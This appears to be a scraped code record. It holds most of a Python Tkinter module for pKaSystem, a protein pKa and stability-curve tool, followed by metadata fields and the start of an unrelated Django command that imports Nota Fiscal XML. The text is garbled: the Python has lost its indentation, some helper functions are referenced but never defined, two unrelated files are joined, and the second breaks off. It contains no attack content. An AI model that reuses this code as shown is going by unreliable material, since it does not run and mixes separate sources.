self.fit_menu.add_command(label='Fit to loaded curves and pH-activity profile',command=self.fit_to_curves_and_ph_activity_profile)
self.fit_menu.add_command(label='Estimate experimental uncertainty',command=self.estimate_experimental_uncertainty)
self.fit_menu.add_separator()
self.fit_menu.add_command(label='Fit to FTIR data',command=self.fit_ftir)
self.fit_menu.add_command(label='Fit to FTIR data and pH-activity profile',command=self.fit_to_ftir_and_ph_activity_profile)
self.fit_menu.add_separator()
self.fit_menu.add_command(label='Combinatorial scan',command=self.combinatorial_scan)
self.fit_menu.add_command(label='Show close parameter sets',command=self.show_close)
self.fit_menu.add_command(label='Test uniqueness',command=self.test_uniqueness)
self.fit_menu.add_command(label='Uniqueness scan',command=self.uniqueness_scan)
self.fit_menu.add_separator()
self.fit_menu.add_command(label='Evaluate fit',command=self.evaluate_fit)
self.geom_var=StringVar()
self.fit_menu.add_command(label="Do geometry optimisation",command=self.start_geom)
self.fit_menu.add_command(label='Identify number of groups in system',command=self.identify_no_groups)
self.menu.add_cascade(label='NMR',menu=self.fit_menu)
#
# System analysis and optimisation
#
self.optana_menu=Menu(self.menu,tearoff=0)
self.optana_menu.add_command(label='CCPS population/Stability',command=self.stab_and_CCPS_pop)
self.menu.add_cascade(label='Optimise and Analyse',menu=self.optana_menu)
#
# View menu
#
self.view_menu=Menu(self.menu,tearoff=0)
# Show microscopic states
self.micro_var=IntVar()
self.micro_var.set(0)
self.view_menu.add_checkbutton(label='Microscopic titration',
command=self.update_pkasystem_curves,
variable=self.micro_var,onvalue=1,offvalue=0)
# Show loaded titration curves
self.display_loaded_curves=IntVar()
self.display_loaded_curves.set(0)
self.view_menu.add_checkbutton(label='Loaded titration curves',
command=self.update_pkasystem_curves,
variable=self.display_loaded_curves,onvalue=1,offvalue=0)
# Show ftir window
self.show_ftir=IntVar()
self.show_ftir.set(0)
self.view_menu.add_checkbutton(label='Show FTIR window',
command=self.update_pkasystem_curves,
variable=self.show_ftir,onvalue=1,offvalue=0)
#
# Window for manipulating kcat of microstates
#
self.kcat_window_visible=IntVar()
self.kcat_window_visible.set(0)
self.view_menu.add_checkbutton(label='kcat of microstates',
command=self.toggle_kcat_window,variable=self.kcat_window_visible,onvalue=1,offvalue=0)
self.menu.add_cascade(label='View',menu=self.view_menu)
#
# Help menu
#
self.help_menu=Menu(self.menu,tearoff=0)
self.help_menu.add_command(label='About pKaSystem',command=self.about)
self.menu.add_cascade(label='Help',menu=self.help_menu)
#
# Configure the menu
#
self.win.config(menu=self.menu)
#
self.win.title('Group controls')
#
# Place window close to center
#
self.win.geometry('+%d+%d' %(screen_width/2-min(600,screen_width/4),screen_height/2-min(500,screen_height/3)))
#
# Buttons for each group
#
int_ene=1
for id_num in range(self.numgrps):
#colour=self.colour_order[id_num%len(self.colour_order)]
int_ene=1
self.groups[id_num]=group_control.group_control(self,
self.startrow+id_num,
id_num,
self.numgrps,
int_ene,
self.colour_order)
#
# Button for controlling stability window
#
self.stability_var=StringVar()
self.stability_var.set('off')
self.stab_button=Checkbutton(self.win,text='Stability curve: ',
variable=self.stability_var,onvalue='on',
offvalue='off',
command=self.stability_on_off)
self.stab_button.deselect()
self.stab_button.grid(row=0,column=0,columnspan=2)
#
# Exit button
#
if self.enzsim:
self.exit_bt=Button(self.win,text='Data->EnzSim',command=self.quit_application)
else:
self.exit_bt=Button(self.win,text='Quit',command=self.quit_application)
self.exit_bt.grid(row=0,column=2,sticky='wens')
#
# Snapshot button
#
self.snapshot_btn=Button(self.win,text='Snapshot',command=self.snapshot)
self.snapshot_btn.grid(row=0,column=3,sticky='wens')
#
# Window capture button
#
self.print_btn=Button(self.win,text='Print2File',command=self.print2file)
self.print_btn.grid(row=0,column=4,sticky='wens')
#
# Clear button
#
self.clr_btn=Button(self.win,text='Clear all',command=self.clear)
self.clr_btn.grid(row=0,column=5,sticky='wens')
#
# pHstep slider
#
self.pHstep=DoubleVar()
self.pHstep_sl=Scale(self.win,from_=0.01,to=2.0,resolution=0.01,
orient='horizontal',relief='ridge',
command=self.update_pkasystem_curves,variable=self.pHstep,
label='pHstep')
self.pHstep_sl.grid(row=0,column=6,sticky='wens')
self.pHstep.set(0.5)
#
# pKa calculation method selector
#
self.pkamethod_sel=StringVar()
self.pkamethod_sel.set('Boltzmann')
self.pkamethod_button=Menubutton(self.win,textvariable=self.pkamethod_sel,relief=RAISED)
self.pkamethod_menu=Menu(self.pkamethod_button,tearoff=0)
self.pkamethod_button['menu']=self.pkamethod_menu
#
# Methods
#
for method in self.pkamethods.keys():
self.pkamethod_menu.add_radiobutton(label=method,
variable=self.pkamethod_sel,
value=method,
indicatoron=1,
command=self.update_pkasystem_curves)
self.pkamethod_button.grid(row=0,column=7,sticky='news')
#
# Monte Carlo steps
#
self.MCsteps=IntVar()
self.mcsteps_scale=Scale(self.win,from_=0,to=2500,resolution=100,
orient='horizontal',relief='ridge',
command=self.update_pkasystem_curves,
variable=self.MCsteps,
state=DISABLED,
label='Monte Carlo steps')
self.MCsteps.set(self.numgrps*100)
self.mcsteps_scale.grid(row=0,column=8,sticky='news')
#
# Button for updating the titration curves
#
stab_test=Button(self.win,text='Update curves',command=self.update_pkasystem_curves)
stab_test.grid(row=0,column=9,sticky='wens')
#
# Reposition the window with the titration curves according to the
# size of the control window
#
width,height,xorg,yorg=self.get_geometry(self.win)
self.titwin.geometry('+%d+%d' %(xorg-5,yorg+height+5))
#
# Draw the first curves
#
self.titwin.update()
self.win.update()
self.init_not_done=None
self.titwin.update()
self.win.update()
self.activate_callbacks()
#if self.master.update:
# self.update_pkasystem_curves()
#
# Done
#
return
#
# -----
#
def about(self):
"""Print the About section"""
import tkMessageBox
tkMessageBox.showinfo("pKaTool / pKaSystem",
                              'pKaTool version %s\nAuthors: Jens Erik Nielsen & Chresten Søndergaard\n\nCopyright (c) Jens Erik Nielsen\nUniversity College Dublin 2003-2007\nAll rights reserved\nhttp://enzyme.ucd.ie/Science/pKa\n\nPlease remember to cite:\nAnalysing the pH-dependent properties of proteins using pKa calculations\nNielsen JE\nJ Mol Graph Model 2007 Jan;25(5):691-9\n\nIf using the NMR fitting routines please cite:\n\nDetermination of electrostatic interaction energies and protonation state populations in enzyme active sites\nSøndergaard CR, McIntosh LP, Pollastri G, Nielsen JE\nJ. Mol. Biol. (in press).' %__pKaSystemVersion__,parent=self.master)
return
#
# --------------------
#
def get_geometry(self,widget):
"""Get the geometry of a widget
Return width,height,xorg,yorg"""
widget.update_idletasks()
txt=widget.winfo_geometry()
width=int(txt.split('x')[0])
rest=txt.split('x')[1]
height=int(rest.split('+')[0])
xorg=int(rest.split('+')[1])
yorg=int(rest.split('+')[2])
return width,height,xorg,yorg
#
# -------
#
def quit_application(self):
"""Quit application"""
self.win.destroy()
self.titwin.destroy()
return
#
# --------------------
#
def snapshot(self):
#
# Preserve the current lines (for making figures)
#
x=0
for line in self.lines.keys():
x=x+1
if x==1:
self.tc.delete(line)
else:
self.to_clear.append(line)
del self.lines[line]
if x==2:
x=0
return
#
# --------------------
#
def print2file(self):
#
# Print Canvas to file
#
import sys, os
if not self.lastdir:
self.lastdir=os.getcwd()
filename=tkFileDialog.asksaveasfilename(defaultextension='.ps',
initialdir=self.lastdir,
filetypes=[("Postscript files","*.ps"),("All files","*.*")])
if filename:
self.write_psfile(filename)
else:
return
return
#
# --------------------
#
def write_psfile(self,filename):
"""
# Dump the Canvas to a postscript file
"""
import os
self.lastdir=os.path.split(filename)[0]
if filename[-3:]!='.ps':
filename=filename+'.ps'
self.tc.postscript(colormode='color',file=filename)
return
#
# --------------------
#
def clear(self,junk=None):
#
# Clear all lines
#
for line in self.to_clear:
self.tc.delete(line)
return
#
# --------------------
#
def stability_on_off(self):
"""Open a window for drawing the stability curve"""
#
# Should we open the stability window?
#
new=self.stability_var.get()
if new=='on' and self.old_stab_status!='on':
#
# Yes, open it
#
self.stab_test_on=1
self.old_stab_status='on'
self.stab_window=Toplevel()
#
self.stabwidth=1000
self.stabheight=300
self.stab_window.geometry('%dx%d+10+20' %(self.stabwidth,self.stabheight))
self.stab_window.title('pH dependence of protein stability')
self.stab_tc=Canvas(self.stab_window,bd=5,bg='white',width=self.titwidth,height=self.titheight,scrollregion=(0,0,self.titwidth,self.titheight))
self.stab_tc.xview("moveto", 0)
self.stab_tc.yview("moveto", 0)
self.stab_tc.grid(row=1,column=0)
#
# Plotting button
#
            def print_curve(event=None):
                # Callback body is missing from the source; keep it a no-op so
                # the button below can still be created.
                return
            Button(self.stab_window,command=print_curve).grid(row=0,column=0)
# pH axis
self.stab_startx=80
self.stab_endx=910
self.stab_starty=160
self.stab_endy=10
self.pH_axis(self.stab_tc,self.stab_startx,self.stab_starty,
self.stab_endx,self.stab_endy)
#
# Controls for unfolded pKa values
#
self.U_control=Toplevel()
self.U_control.title('Controls for Unfolded form')
self.U_control.geometry('+10+10')
self.unfolded_groups={}
for id_num in range(self.numgrps):
int_ene=1
#colour=self.colour_order[id_num%len(self.colour_order)]
self.unfolded_groups[id_num]=group_control.group_control(self,
self.startrow+id_num,id_num,
self.numgrps,int_ene,self.colour_order,window=self.U_control)
#
# If we are displaying real groups then set the intrinsic pKa to the model pKa value
#
if self.parent_application:
intpKa_folded=self.groups[id_num].modelpK
else:
intpKa_folded=self.groups[id_num].intpka.get()
#
self.unfolded_groups[id_num].intpka.set(intpKa_folded)
#
#
#
row=self.startrow+self.numgrps+1
self.show_grp_contribs=IntVar()
self.show_grp_contribs.set(0)
grp_contribs=Checkbutton(self.U_control,text='Show residue contributions',
onvalue=1,offvalue=0,variable=self.show_grp_contribs,command=self.update_pkasystem_curves)
grp_contribs.grid(row=row,column=0)
#
# Which contribution should we draw
#
self.contrib_type=IntVar()
self.contrib_type.set(1)
Radiobutton(self.U_control,text='contributions from pKa shifts',variable=self.contrib_type,value=1,command=self.update_pkasystem_curves).grid(row=row,column=1)
#Radiobutton(self.U_control,text='charge-charge contributions',variable=self.contrib_type,value=2,command=self.update_curves).grid(row=row,column=2)
#
# Should we show min and max stabilisation?
#
self.show_min_max_stab=IntVar()
self.show_min_max_stab.set(1)
Checkbutton(self.U_control,text='Show min and max stabilisation',
onvalue=1,
offvalue=0,
variable=self.show_min_max_stab,
command=self.update_pkasystem_curves).grid(row=row,column=3)
#
# Update curves
#
self.window.update()
self.U_control.update()
self.stab_test_on=None
self.update_pkasystem_curves()
#
# Move the windows to sensible positions
#
width,height,xorg,yorg=self.get_geometry(self.win)
self.U_control.geometry('+%d+%d' %(xorg,yorg+height))
#
width,height,xorg,yorg=self.get_geometry(self.U_control)
self.stab_window.geometry('+%d+%d' %(xorg,yorg+height))
#
# Activate the callbacks for the unfolded groups
#
self.activate_callbacks()
else:
self.old_stab_status='off'
self.stab_window.destroy()
self.U_control.destroy()
return
#
# --------------------
#
def dummy(self,event=None):
"""Dummy callback function"""
return
#
# ----
#
def setup_system(self,group_array,X,energies=None):
"""Set up the system of titratable groups from the info in group_array"""
import string
#
# Create the description of the system
#
self.names={}
self.ids={}
for group in group_array.keys():
name=':'+string.zfill(group,4)+':'
if group_array[group].acid_base.get()==1:
name=name+'ASP'
else:
name=name+'ARG'
self.names[group]=name
self.ids[name]=group
#
        # Update experimental data dictionary to new names...
#
if getattr(self,'titration_data',None):
for old_key in self.titration_data.keys():
for new_key in self.names:
if int(old_key[1:5]) == int(self.names[new_key][1:5]):
nk = old_key[0:6]+self.names[new_key][6:]
self.titration_data[self.names[new_key]]=self.titration_data[old_key]
if not old_key == self.names[new_key]:
del self.titration_data[old_key]
#
# Add all data
#
matrix={}
X.intene={}
X.intrinsic_pKa={}
for group in group_array.keys():
#
# Set everything
#
name1=self.names[group]
# Int pKa
intpka=group_array[group].intpka.get()
X.intrinsic_pKa[name1]=intpka
type=group_array[group].acid_base.get()
#
# Set the interaction energies
#
if not X.intene.has_key(group):
X.intene[name1]={}
matrix[name1]={}
for group2 in group_array[group].intenes.keys():
type2=group_array[group2].acid_base.get()
name2=self.names[group2]
if group_array[group].active.get()==1 and group_array[group2].active.get()==1:
if type==type2:
X.intene[name1][name2]=group_array[group].intenes[group2].get()
else:
X.intene[name1][name2]=-group_array[group].intenes[group2].get()
if name1!=name2:
matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies)
else:
X.intene[name1][name2]=0.0
#
# We only have part of the interaction energies in each group
# This is because the interaction energy is stored as a single
# Tk variable
#
for group2 in group_array.keys():
name2=self.names[group2]
type2=group_array[group2].acid_base.get()
if group2!=group:
if group_array[group2].intenes.has_key(group):
#
# Is this group active?
#
if group_array[group].active.get()==1 and group_array[group2].active.get()==1:
if type==type2:
X.intene[name1][name2]=group_array[group2].intenes[group].get()
else:
X.intene[name1][name2]=-group_array[group2].intenes[group].get()
#
# Matrix of distances
#
if name1!=name2:
matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies)
else:
X.intene[name1][name2]=0.0
#
else:
X.intene[name1][name2]=0.0
# Default distance for zero interaction energy
if name1!=name2:
matrix[name1][name2]=self.E2dist(0.0,energies)
#
# All Done
#
return matrix
#
# -----------------
#
def E2dist(self,E,energies=None):
"""
# convert an electrostatic interaction energy to a distance
# Units: E(kT), dist: A
If energies==1, then we do not convert the energy"""
#
# Check if we should return energies
#
import math
if energies:
return E
#
# No, return distances
#
E=abs(E) # the sign doesn't matter
if E>0.001:
#
# Look in Tynan-Connolly and Nielsen, Protein Science: Re-Designing protein pKa values
# for details on the formula below
#
eps=1.0 # We set eps to 1, and scale distances afterwards
distance=243.3*math.log(10.0)/(eps*E)
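            # e.g. with eps=1, E=5.6 kT gives 243.3*ln(10)/5.6 ~ 100 A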
else:
distance=1000.0
return distance
#
# ------------------
#
def calc_pKas_from_scales(self,group_array):
"""Calculate pKa values for the system"""
#
# Fill instance with data
#
X=self.pkamethods[self.pkamethod_sel.get()]()
MCsteps=0
if self.pkamethod_sel.get()=='Monte Carlo':
MCsteps=self.MCsteps.get()
self.mcsteps_scale.configure(state=ACTIVE)
elif self.pkamethod_sel.get()=='Monte Carlo (C++)':
MCsteps=200000
else:
self.mcsteps_scale.configure(state=DISABLED)
#
matrix_dummy=self.setup_system(group_array,X)
#
# Set the pKa value variables
#
X.groups=X.intrinsic_pKa.keys()
X.groups.sort()
#
# Make a list of experimental pH values to include in calculation
#
exp_pHs =[]
if getattr(self,'titration_data',None):
for group in self.titration_data.keys():
for pH in self.titration_data[group].keys():
if exp_pHs.count(pH) == 0:
exp_pHs.append(pH)
#
# also include pH values from loaded ph-activity profile
#
if getattr(self,'activity_data',None):
for pH in self.activity_data.keys():
if exp_pHs.count(pH) == 0:
exp_pHs.append(pH)
#
# and also from ftir data
#
if getattr(self, 'FTIR_win',None):
for pH in self.FTIR_win.ftir_data.keys():
if exp_pHs.count(pH) ==0:
exp_pHs.append(pH)
#
# Include the effect of non-system groups?
#
if hasattr(self,'non_system_groups'):
if self.non_system_groups:
X.non_system_groups={}
for group_id in self.non_system_groups.keys():
name=self.names[group_id]
X.non_system_groups[name]=self.non_system_groups[group_id].copy()
#
# Get the pKa values
#
pKa_values,prot_states=X._calc_pKas(mcsteps=MCsteps,
phstep=self.pHstep.get(),
phstart=self.pHstart,
phend=self.pHend,
exp_pHs=exp_pHs,
verbose=1)
return X,pKa_values,prot_states
#
# -----------------
#
def update_scales(self,junk=None,draw=1,doit=None):
"""Update the scale widgets when the user moves a dial"""
#
# Folded (normal) groups
#
for group in self.groups.keys():
self.groups[group].update_scales()
#
        # Update the unfolded scales if they're active
#
if self.stability_var.get()=='on':
for group in self.unfolded_groups.keys():
self.unfolded_groups[group].update_scales()
#
# Redraw everything
#
self.update_pkasystem_curves(junk,draw,doit)
return
#
# -----
#
def update_scales_from_fit(self,junk=None,draw=1,doit=None):
#
# update group scales from fitter
#
for group in self.groups:
self.groups[group].update_scales_from_fit()
self.update_pkasystem_curves(junk,draw,doit)
return
#
# -----
#
def update_pkasystem_curves(self,junk=None,draw=1,doit=None):
"""Update all curves"""
if self.init_not_done:
return
if self.stab_test_on and doit==None:
return
#
# Redraw the curves
#
import string, pKarun
PKana=pKarun.pKa_general.pKanalyse()
#
# Calculate pKa values for the folded form
#
X,pKa_values,prot_states=self.calc_pKas_from_scales(self.groups)
self.pKa_calc_instance=X
if not draw:
return X
#
# Set the pKa values
#
for group in pKa_values.keys():
self.groups[self.ids[group]].update_group_control()
self.groups[self.ids[group]].pkavalue.set("%4.1f" %pKa_values[group])
#
# Set the HH fit
#
solution,sq=PKana.fit_to_henderson(X.prot_states[group])
try:
self.groups[self.ids[group]].HHfit.set('%5.2f (%4.2f / %3.2f)' %(abs(float(solution[1])),abs(float(solution[0])),float(sq)))
except:
self.groups[self.ids[group]].HHfit.set('HH-fit error')
#
# Delete all lines from last round
#
for line in self.lines.keys():
self.tc.delete(line)
del self.lines[line]
# Draw the titration curves
self.titration_curves={}
groups=pKa_values.keys()
groups.sort()
group_count=0
colour_map = {}
for group in groups:
#
# Store everything in self.titration_curves
#
self.titration_curves[group]=X.prot_states[group].copy()
#
# Is this group active?
#
if self.groups[group_count].active.get()==0:
group_count=group_count+1
continue
#
# Yes
#
style=self.groups[group_count].style.get()
lastpH=X.pHvalues[0]
lastcrg=X.prot_states[group][lastpH]
colour=self.colour_order[group_count%len(self.colour_order)]
colour_map[group] = colour
#
for pH in X.pHvalues[1:]:
lastx,lasty=self.get_xy(lastpH,lastcrg)
crg=X.prot_states[group][pH]
x,y=self.get_xy(pH,crg)
if style==1:
self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y),
fill=colour,
width=self.linewidth))]=1
else:
self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y),
fill=colour,
width=self.linewidth,
dash=(1,2)))]=1
lastcrg=crg
lastpH=pH
#
# Update the counter for colours
#
group_count=group_count+1
#
# Should we draw the microscopic states?
#
if self.micro_var.get()==1:
self.update_microstates(X)
else:
self.close_state_win()
#
# Should we draw the stabilty curves?
#
stab_status=self.stability_var.get()
if stab_status=='on':
self.stability=self.do_stab_curve(X)
#
# Should we display loaded titration curves?
#
#try:
# print 'titration_data', self.titration_data
#except:
# print 'no titration_data'
if self.display_loaded_curves.get()==1:
if not getattr(self,'titration_data',None):
import tkMessageBox
tkMessageBox.showwarning('No titration curves loaded',
'Load titration curves first')
self.display_loaded_curves.set(0)
else:
for group in self.titration_data.keys():
phvals=self.titration_data[group].keys()
phvals.sort()
for ph in phvals:
crg=self.titration_data[group][ph]
x,y=self.get_xy(ph,crg)
try:
f = colour_map[group]
except:
f = 'yellow'
handle=self.tc.create_oval(x-2,y-2,x+2,y+2,fill=f)
self.lines[handle]=1
#
# Is there an FTIR model to update?
#
if self.show_ftir.get() == 1:
if getattr(self, 'FTIR_win',None):
self.FTIR_win.draw_fit()
else:
self.FTIR_win = ftir_data.FTIR_data(self)
self.FTIR_win.draw_fit()
#
# Other callbacks?
#
self.check_other_callbacks()
return X
#
# -------
#
def check_other_callbacks(self):
"""self.callbacks holds a list of funcions that should be called"""
if not hasattr(self,'callbacks'):
self.callbacks=[]
for callback in self.callbacks:
callback()
return
def add_callback(self,function):
"""Add a callback function"""
self.check_other_callbacks()
add=1
for callback in self.callbacks:
if function==callback:
add=None
break
if add:
self.callbacks.append(function)
self.check_other_callbacks()
return
#
# -------------
#
def do_stab_curve(self,X):
""" Calculate the stability curve"""
#
# Make sure that the acid/base info for the unfolded form is the same
# as for the folded form
#
for group in self.unfolded_groups.keys():
acid_base=self.groups[group].acid_base.get()
self.unfolded_groups[group].acid_base.set(acid_base)
#
# Calculate pKa values for the unfolded form
#
UF,ufpKa_values,UF_prot_states=self.calc_pKas_from_scales(self.unfolded_groups)
for group in ufpKa_values.keys():
self.unfolded_groups[self.ids[group]].pkavalue.set("%4.1f" %ufpKa_values[group])
#
# Get all the interaction energies
#
ufmatrix=self.setup_system(group_array=self.unfolded_groups,X=UF,energies=1)
matrix=self.setup_system(group_array=self.groups,X=X,energies=1)
#
# Integrate
#
integral=0.0
intcurve=[]
intcurve2=[]
dpH=abs(X.pHvalues[0]-X.pHvalues[1])
min_val=99999
max_val=-9999
#
# Specify constants
#
k=1.3806503E-23
T=298.15
Na=6.02214199E23
#factor=k*T*Na/1000.0
# No don't do it
factor=1
import math
ln10=math.log(10)
#
# Loop over all pH values
#
stability={}
for pH in X.pHvalues:
intcurve.append(integral)
stability[pH]=integral #Dictionary that will be passed back
#
# Update min and max
#
if integral<min_val:
min_val=integral
if integral>max_val:
max_val=integral
#
# Calculate total stability
#
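            # Hedged note: by Wyman linkage, d(dG)/d(pH) is ln(10)*kT times
            # the protonation difference between the folded and unfolded
            # forms, so the curve is accumulated as a running sum in dpH steps.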
for group in ufpKa_values.keys():
integral=integral+ln10*dpH*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor
#
# Calculate the electrostatic interaction
#
integral2=0
for group in matrix.keys():
for group2 in matrix.keys():
#
# Get the interaction between this group and the other group
#
g1_id=self.ids[group]
g2_id=self.ids[group2]
if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2:
integral2=integral2+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor
# Subtract the interaction in the unfolded state
integral2=integral2-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor
#
# Update min and max
#
if integral2<min_val:
min_val=integral2
if integral2>max_val:
max_val=integral2
intcurve2.append(integral2)
max_stabilisation=max_val
min_stabilisation=min_val
#
# Plot the whole thing
#
lastpH=X.pHvalues[0]
lastval=intcurve[0]
count=1
span=max_val-min_val
#
# Delete the lines from last time
#
for line in self.stab_lines.keys():
self.stab_tc.delete(line)
del self.stab_lines[line]
#
# Draw the y axis
#
canvas=self.stab_tc
x_axis=self.get_x(X.pHvalues[0])-20
y_axis=get_y_fromstab(min_val,span)
endy=get_y_fromstab(max_val,span)
self.stab_lines[canvas.create_line(x_axis,max([160,y_axis]),
x_axis,endy-10,fill='black',
width=self.linewidth)]=1
self.stab_lines[canvas.create_text(x_axis+10,endy-35,text='delta G of folding (kT)',fill='black',anchor='w')]=1
#
# Tick marks and tick labels
#
for tickval in range(int(min_val*100),int(max_val*100),int(max([(span*100.0)/5.0,1.0]))):
y=get_y_fromstab(tickval/100.0,span)
self.stab_lines[canvas.create_line(x_axis,
y,x_axis-5,y,
fill='black',width=self.linewidth)]=1
self.stab_lines[canvas.create_text(x_axis-25,y,text='%5.2f' %(
float(tickval)/100.0),fill='black')]=1
#
# Draw the stability lines
#
count=1
summed_contributions={}
label_position={}
for pH in X.pHvalues[1:]:
lastx=self.get_x(lastpH)
lasty=get_y_fromstab(lastval,span)
val=intcurve[count]
x=self.get_x(pH)
y=get_y_fromstab(val,span)
self.stab_lines[self.stab_tc.create_line(lastx,lasty,float(x),float(y),
fill='black',
width=self.linewidth)]=1
#
# Outline the contribution of each group
#
if self.show_grp_contribs.get()==1:
colour_count=0
null_y=get_y_fromstab(0.0,span)
starty_positive=null_y
starty_negative=null_y
ufgroups=ufpKa_values.keys()
ufgroups.sort()
for group in ufgroups:
#
# Is this group active?
#
g1_id=self.ids[group]
if self.groups[g1_id].active.get()==1:
#
# Make sure the dictionary is initialised
#
if not summed_contributions.has_key(group):
summed_contributions[group]=0.0
label_position[group]=None
#
# Get this contribution
#
dx=abs(lastx-x)
if self.contrib_type.get()==1:
#
# Here we get the stability contribution from pKa shifts
#
endy=get_y_fromstab(dpH*ln10*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor,span)-null_y
summed_contributions[group]=summed_contributions[group]+endy
else:
#
# Otherwise the stability contribution from charge-charge interactions
#
stab=0.0
for group2 in matrix.keys():
#
# Get the interaction between this group and the other group
#
g2_id=self.ids[group2]
if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2:
stab=stab+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor
# Subtract the interaction in the unfolded state
stab=stab-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor
endy=get_y_fromstab(stab,span)-null_y
summed_contributions[group]=endy
#
# Draw the box
#
endy=summed_contributions[group]
if endy>0:
self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_positive,lastx+1.5*dx,endy+starty_positive,
fill=self.colour_order[colour_count],
outline=self.colour_order[colour_count],
stipple='gray50',
width=self.linewidth)]=1
label_position[group]=(starty_positive*2+endy)/2.0
starty_positive=endy+starty_positive
else:
self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_negative,lastx+1.5*dx,endy+starty_negative,
fill=self.colour_order[colour_count],
outline=self.colour_order[colour_count],
stipple='gray50',
width=self.linewidth)]=1
label_position[group]=(starty_negative*2+endy)/2.0
starty_negative=endy+starty_negative
colour_count=colour_count+1
if colour_count==len(self.colour_order):
colour_count=0
#
# Continue
#
lastval=val
lastpH=pH
count=count+1
#
# Put labels on the contributions
#
if self.show_grp_contribs.get()==1:
colour_count=0
for group in ufgroups:
#
# Is this group active?
#
g1_id=self.ids[group]
if self.groups[g1_id].active.get()==1:
x=self.get_x(X.pHvalues[-1])
y=label_position[group]
colour=self.colour_order[colour_count]
self.stab_lines[canvas.create_text(x+50,y,text=group,
fill=colour,
anchor='w')]=1
#
# Update colours
#
colour_count=colour_count+1
if colour_count==len(self.colour_order):
colour_count=0
#
# Put in labels for min and max stabilisation
#
if self.show_min_max_stab.get()==1:
obj1=canvas.create_text(850,150,text='MAX destab: %5.2f kT' %max_stabilisation,fill='red',anchor='w')
obj2=canvas.create_text(850,180,text='MAX stab: %5.2f kT' %min_stabilisation,fill='blue',anchor='w')
self.stab_lines[obj1]=1
self.stab_lines[obj2]=1
#
# Do we have an experimental stability curve?
#
if self.exp_stab_curve:
for pH,ddG in self.exp_stab_curve:
x=self.get_x(pH)
y=get_y_fromstab(ddG,span)
self.stab_lines[canvas.create_oval(x-5,y-5,x+5,y+5)]=1
return stability
#
# ---------------
#
def start_geom(self):
"""Start geom opt"""
import pKa_calc
X=pKa_calc.Boltzmann()
distance_matrix=self.setup_system(self.groups,X)
import dist_geom
GM=dist_geom.distance_optimisation(distance_matrix,self.titration_curves)
return
#
# ----
#
def do_geom(self):
#
# Do geometry optimisation
#
# Update distances
#
import pKa_calc
X=pKa_calc.Boltzmann()
distance_matrix=self.setup_system(self.groups,X)
self.MD.set_eqdists(distance_matrix)
        diff=self.MD.EM(1) # run the minimisation step; 'diff' is reported below
#
# Delete old ovals
#
for oval in self.oval.keys():
self.geom_tc.delete(oval)
del self.oval[oval]
#
# Plot positions
#
group_count=0
groups=self.MD.atoms.keys()
groups.sort()
for grp in groups:
pos=self.MD.atoms[grp]['pos']
x=pos[0]
y=pos[1]
z=pos[2]
self.oval[self.geom_tc.create_oval(x-5,y-5,x+5,y+5,fill=self.colour_order[group_count])]=1
group_count=group_count+1
self.oval[self.geom_tc.create_text(10,10,anchor='nw',text='Sum of unsatisfied dists: %5.3f' %(diff))]=1
self.geom_window.after(100,self.start_geom)
return
#
# ----------------
#
def copy_to_Ekin(self):
"""Copy a titration curve or a population curve to the Ekin facility of EAT_DB"""
try:
import os,sys
import PEATDB.Ekin
except:
import tkMessageBox
tkMessageBox.showwarning('Cannot find PEAT',
'Cannot find PEAT_DB\nMake sure that you download PEAT from\nhttp://enzyme.ucd.ie/PEAT')
return
#
# Pick a group
#
self.pick_group=Toplevel()
self.pick_group.title('Pick a group')
self.pick_group.geometry('+200+200')
self.group_picked=IntVar()
count=0
groups=self.groups.keys()
groups.sort()
for group in groups:
Radiobutton(self.pick_group,text='%d:%s' %(group,self.groups[group].name.get()),
variable=self.group_picked,
value=count).grid(row=count,column=0)
count=count+1
self.group_picked.set(groups[0])
Button(self.pick_group,text='Copy group',command=self.copy_group).grid(row=count,column=0)
Button(self.pick_group,text='Cancel',command=self.cancel_copy_group).grid(row=count,column=1)
return
#
# ----
#
def copy_group(self,event=None):
"""Get the titration curve and send it to Ekin"""
group=None
for id in self.ids.keys():
if self.ids[id]==self.group_picked.get():
group=id
break
if not group:
            raise Exception('Something very odd happened in copy_group')
#
# Get the data and reformat it
#
data=self.titration_curves[group].copy()
del data['pKa']
new_data={}
new_data[0]={}
new_data[1]={}
count=0
pHs=self.titration_curves[group].keys()
pHs.sort()
for pH in pHs:
new_data[0][count]=pH
new_data[1][count]=self.titration_curves[group][pH]
count=count+1
#
# Open Ekin, and load the data
#
import os,sys
        import PEATDB.Ekin
        EK=PEATDB.Ekin.Ekin(parent=self)
EK.pass_data(new_data)
#
# Destroy the little window
#
self.pick_group.destroy()
return
#
# ----
#
def cancel_copy_group(self,event=None):
"""Cancel copy group to Ekin"""
self.pick_group.destroy()
return
#
# -----------------
#
if __name__=='__main__':
import sys
if len(sys.argv)==2:
numgroups=int(sys.argv[1])
pKa_system(numgroups).mainloop()
else:
pKa_system().mainloop()
|
mit
| 2,878,138,869,651,541,500
| 35.954967
| 667
| 0.510268
| false
| 3.820223
| false
| false
| false
|
dudanogueira/microerp
|
microerp/producao/management/commands/nfe.py
|
1
|
6041
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
from django.contrib.sites.models import Site
from cadastro.models import Cidade, Bairro
from rh.models import Funcionario, PeriodoTrabalhado, Cargo, Departamento
from account.models import User
from optparse import make_option
import os, csv, datetime
from django.utils.encoding import smart_unicode, smart_str
from xml.dom import minidom
from producao.models import FabricanteFornecedor
from producao.models import NotaFiscal
class Command(BaseCommand):
help = '''
Importa Nota Fiscal
'''
args = "--file notafiscal.xml,"
option_list = BaseCommand.option_list + (
make_option('--file',
action='store_true',
dest='arquivo',
help='Importa uma nota fiscal',
),
)
def handle(self, *args, **options):
arquivo = options.get('arquivo')
